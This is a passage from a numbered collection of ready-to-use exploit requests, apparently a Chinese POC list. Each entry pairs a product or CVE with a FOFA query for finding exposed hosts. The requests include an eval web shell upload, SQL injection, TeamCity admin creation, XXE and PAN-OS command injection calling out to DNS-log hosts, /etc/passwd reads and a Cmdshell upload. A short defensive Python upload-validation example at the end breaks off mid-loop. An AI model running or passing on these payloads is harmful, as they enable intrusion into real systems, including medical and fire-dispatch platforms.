Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Adobe ColdFusion 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin URL: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 Cloud Mall (H5 云商城) file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec (网康) NS-ASG application security gateway index.php SQL injection
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec (网康) NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kirisun (福建科立讯) communication command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kirisun (福建科立讯) communication command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kirisun (福建科立讯) communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kirisun (福建科立讯) communication command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Fujian Kirisun (福建科立讯) communication command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to be executed (base64-encoded: aWQ= decodes to id)
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v.4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component ids
http://x.x.x.x/config

Step 2: write the contents of /etc/passwd into a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianwell (天维尔) fire rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. LyLme Spage (六零导航页) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Access the uploaded file: http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

Uploaded file: http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. 英飞达 (INFINITT) medical imaging PACS WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PAYLOAD</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

Then request the uploaded handler: /1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal / arbitrary file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓全智能停车收费系统 Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. <fileName> sets the file name (../ segments are accepted, so the file can be placed in the web root) and <fileFlow> carries the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

Step 2: request the written file:
http://x.x.x.x/dizxdell.aspx

162. 和丰多媒体信息发布系统 QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

Uploaded file (remotePath is client-controlled): http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团分销管理系统 ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

Uploaded file: http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx
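The upload at the start of this section and entries 157, 159 and 161 to 164 (and, further down, 176, 178 and 192) share one root cause: the handler stores the client-supplied file name under a web-served directory, in 161 even with ../ segments, and at most checks the declared Content-Type, which the POCs simply set to image/png or image/jpeg. The Python below is an added example written for this page, not code from any of those products: save_upload_unsafe() reproduces that pattern and save_upload_safe() shows the checks that stop every POC above (extension allow-list, magic bytes matched against the extension, a server-generated name, final path confined to the upload root). Both functions only compute the path that would be written, nothing touches the filesystem; UPLOAD_ROOT, the function names and the probe inputs are illustrative assumptions.

```python
import posixpath
import secrets
from dataclasses import dataclass

UPLOAD_ROOT = "/srv/app/uploads"   # assumed upload directory (illustrative)

# Allowed extensions and the leading bytes a file of that type must start with.
MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
    "pdf": b"%PDF-",
}
# Server-executed extensions seen in the POCs above; refused outright even if
# the allow-list were ever widened by mistake.
EXECUTABLE = {"php", "phtml", "jsp", "jspx", "asp", "aspx", "ashx", "asmx", "cfm"}


@dataclass
class Upload:
    filename: str       # client-supplied, e.g. "test.php" or "../../../../x.aspx"
    content_type: str   # client-supplied, e.g. "image/png"
    data: bytes


class UploadRejected(ValueError):
    pass


def save_upload_unsafe(up: Upload, root: str = UPLOAD_ROOT) -> str:
    """The vulnerable pattern: trust the declared Content-Type, keep the client
    file name, join it onto the upload root. Returns the path that would be
    written; a name with ../ segments escapes the upload directory."""
    if not up.content_type.startswith("image/"):
        raise UploadRejected("not an image")   # the only check performed
    return posixpath.normpath(posixpath.join(root, up.filename))


def save_upload_safe(up: Upload, root: str = UPLOAD_ROOT) -> str:
    """Hardened version: extension from an allow-list, body must carry the magic
    bytes of that type, server chooses the stored name, final path must stay
    inside root. Returns the path that would be written."""
    # Drop any directory part the client sent (POSIX or Windows separators).
    base = posixpath.basename(up.filename.replace("\\", "/"))
    ext = base.rsplit(".", 1)[-1].lower() if "." in base else ""
    if ext in EXECUTABLE or ext not in MAGIC:
        raise UploadRejected(f"extension not allowed: {ext!r}")
    if not up.data.startswith(MAGIC[ext]):
        raise UploadRejected("content does not match the declared type")
    stored = f"{secrets.token_hex(16)}.{ext}"   # never reuse the client name
    path = posixpath.normpath(posixpath.join(root, stored))
    if posixpath.commonpath([root, path]) != root:   # defence in depth
        raise UploadRejected("path escapes upload root")
    return path


def classify(up: Upload) -> str:
    """Convenience wrapper: 'stored' or 'rejected: <reason>'."""
    try:
        save_upload_safe(up)
        return "stored"
    except UploadRejected as exc:
        return f"rejected: {exc}"


if __name__ == "__main__":
    # Constructed inputs modelled on the POCs above (not real captures).
    probes = [
        Upload("test.php", "image/png", b"<?php phpinfo();?>"),
        Upload("../../../../dizxdell.aspx", "image/png", b"\x89PNG\r\n\x1a\n"),
        Upload("shell.php.png", "image/png", b"\x89PNG\r\n\x1a\n" + b"\0" * 8),
        Upload("logo.png", "image/png", b"\x89PNG\r\n\x1a\n" + b"\0" * 8),
    ]
    for p in probes:
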